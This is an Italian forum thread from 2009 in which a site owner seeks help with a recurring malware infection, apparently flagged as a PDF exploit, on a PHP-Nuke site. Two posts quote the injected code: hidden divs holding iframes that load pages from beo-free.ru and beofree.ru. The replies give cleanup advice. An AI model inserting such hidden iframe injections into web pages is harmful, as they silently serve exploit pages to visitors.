Visualizzazione risultati 1 fino 9 di 9

Discussione: aiuto malware sul sito

  1. 06-10-2009, 12.59.06 #1
    Guest

    Predefinito aiuto malware sul sito

    ho cancellato e riscaricato tutto su mbnet.altervista.org..

    Ma quando mi collego avast mi rileva un malware, ma dove cavolo si è posizionato sto virus maledetto che ho cancellato tutto???

    JS:Pdfka-PL [Expl]
  2. 06-10-2009, 14.00.12 #2
    L'avatar di darkwolf
    darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Controllando il sorgente ho trovato, in cima a tutto il resto, questo codice:
    Codice PHP:
    <div style="display:none">wcyniaoszijylsungmonbczpxnyewdw</div>
    <    div style="display:none">qmlwvrdugrmjmtsbksuuwlajgvrrvwp<iframe width=521 height=610 src="http://beo-free.ru:8080/index.php" ></iframe></div>
    Probabilmente si nasconde nei file del template stesso
  3. 06-10-2009, 20.17.46 #3
    Guest

    Predefinito

    quindi devo cancellare quei codici li ma nel template??
  4. 06-10-2009, 20.24.37 #4
    L'avatar di darkwolf
    darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Citazione Originalmente inviato da mbnet Visualizza messaggio
    quindi devo cancellare quei codici li ma nel template??
    Devi sicuramente eliminare quel codice e, suppongo, si trovi nei file del template
  5. 07-10-2009, 13.02.34 #5
    Guest

    Predefinito

    Quel codice si trova in tutti i file index.htm e index.php

    Ma mi spiegate come cavolo ha fatto ad andarci?

    Codice PHP:
    <div style="display:none">amyoeqavrdrvvoaqazpfhpfginkfmjv<iframe width=194 height=816 src="http://beofree.ru:8080/index.php" ></iframe></div>
    In più tra l'altro lo cancello e si ricrea...
    Ultima modifica di darkwolf : 07-10-2009 alle ore 13.12.46 Motivo: Urlare (scrivere in maiuscolo) non serve a niente.
  6. 07-10-2009, 13.11.09 #6
    L'avatar di darkwolf
    darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Fa una scansione completa con antivirus e antispyware sul tuo pc e cambia la password del sito
  7. 07-10-2009, 20.54.46 #7
    Guest

    Predefinito

    allora si sono rigenerati un'altra volta, ho cancellato tutto ancora...

    domani formatto il pc e riprovo, questa non mi è mai successa....
  8. 07-10-2009, 21.01.41 #8
    L'avatar di darkwolf
    darkwolf
    darkwolf non è connesso Salvatore Noschese
    Data registrazione
    18-04-2007
    Residenza
    Reggiolo (RE)
    Messaggi
    6,558

    Predefinito

    Citazione Originalmente inviato da mbnet Visualizza messaggio
    allora si sono rigenerati un'altra volta, ho cancellato tutto ancora...

    domani formatto il pc e riprovo, questa non mi è mai successa....
    ...
    Io personalmente sono contro la formattazione (se non per casi impossibili).
    Io andrei con: avira; spybot e combofix.
    Dopo questi tre il tuo pc sarà inevitabilmente "pulito".
    Nel caso si generasse ancora allora si dovrebbe rivedere lo script usato (nel tuo caso: PHP-Nuke Copyright © 2005) magari è quello che è buggato"
    -
    Adesso c'è disponibile la 8.1: http://phpnuke.org/modules.php?name=Release
    Ultima modifica di darkwolf : 07-10-2009 alle ore 21.03.40
  9. 14-10-2009, 18.14.26 #9
    Guest

    Predefinito

    non c'è niente da fare ho caricato tutto di nuovo da un altro pc, tra l'altro nuovo...

    e ora ho dei cavalli di troia nel sito pazzesco...

    penso di darci su...
« Discussione precedente | Prossima discussione »

Regole di scrittura

  • Non puoi creare nuove discussioni
  • Non puoi rispondere ai messaggi
  • Non puoi inserire allegati.
  • Non puoi modificare i tuoi messaggi
  •  

Regole del forum